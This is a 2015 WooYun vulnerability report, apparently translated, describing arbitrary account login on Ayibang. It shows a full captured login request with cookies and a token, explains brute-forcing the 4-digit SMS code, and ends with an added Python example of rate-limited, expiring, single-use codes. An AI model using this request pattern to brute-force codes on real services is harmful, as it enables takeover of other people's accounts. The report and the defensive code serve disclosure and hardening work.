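2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-11-01: The vendor chose to ignore the vulnerability; details disclosed to the public
Ayibang: arbitrary user login
Arbitrary user login on Ayibang. Affected site: red.ayibang.com. Hi, this is not a duplicate of WooYun-2015-122517; the domain is different.
red.ayibang.com can be used to log in to Ayibang and has no CAPTCHA, and a brute-forced mobile login verification code can be used to log in on multiple platforms.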
POST /login HTTP/1.1
Host: red.ayibang.com
Proxy-Connection: keep-alive
Content-Length: 593
Accept: application/json
Origin: http://red.ayibang.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://red.ayibang.com/login?data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&return_url=/appointment/?keyword=project_clean_fridge
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=29dbme5s6qol1ldu2ut5ruucv1; Hm_lvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445855848; Hm_lpvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445857939; city=HutcOBNxHtBQ1Zt9Vf1bPK5HlALWxCB%2FOysewRC7UNE%3D; token=jEjKL0ScM2Sv160VZ4mawLDSW6N8eUmgMrIGw8%2BxPxw%3D
Connection: close

phone=13333333333&code=5621&return_url=%2Fappointment%2F%3Fkeyword%3Dproject_clean_fridge%26data%3DYTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9
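Taking the phone number 13333333333 as an example:
Capture the request and brute-force it; the 4-digit verification code was found successfully:
Compare the responses for success and failure:
=====
This verification code can then be used to log in at any login entry point, including the mobile client and the web, for example http://www.ayibang.com/order?_m= Logging in with this verification code succeeded: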
Everything is shown above.
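The weaknesses described above are a short code, unlimited guesses, and a code accepted at every login entry point. The following Python example, added here and not taken from the report or from Ayibang's code, shows server-side handling that caps guesses, expires codes, makes them single use, and binds each code to the channel that issued it; the class name, channel labels and policy constants are assumptions.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5   # assumed policy: wrong guesses allowed per issued code
TTL_SECONDS = 300  # assumed policy: code lifetime in seconds
CODE_DIGITS = 6    # assumed policy: longer than the 4 digits in the report


class LoginCodeStore:
    """In-memory store for SMS login codes (hypothetical name; illustrative only)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}  # (phone, channel) -> [code, expires_at, attempts_left]

    def issue(self, phone, channel):
        """Create a fresh code bound to one phone number and one login channel."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._codes[(phone, channel)] = [code, self._clock() + TTL_SECONDS, MAX_ATTEMPTS]
        return code

    def verify(self, phone, channel, submitted):
        """Return 'ok', 'wrong', 'locked' or 'no_code'; each guess burns one attempt."""
        key = (phone, channel)
        entry = self._codes.get(key)
        if entry is None or self._clock() > entry[1]:
            self._codes.pop(key, None)  # unknown, expired, or issued on another channel
            return "no_code"
        entry[2] -= 1
        if hmac.compare_digest(entry[0].encode(), submitted.encode()):
            del self._codes[key]  # single use: a code never logs in twice
            return "ok"
        if entry[2] <= 0:
            del self._codes[key]  # guess budget spent: a new SMS is required
            return "locked"
        return "wrong"


def guesses_accepted(store, phone, channel, guesses):
    """Count how many guesses the store evaluates before it stops answering."""
    count = 0
    for guess in guesses:
        if store.verify(phone, channel, guess) == "no_code":
            break
        count += 1
    return count
```

A per-code guess cap only helps if code issuance is also rate limited per phone number and per client, since each new SMS otherwise resets the guess budget.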
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-01 17:26
Vulnerability Rank: 2 (WooYun rating)
None yet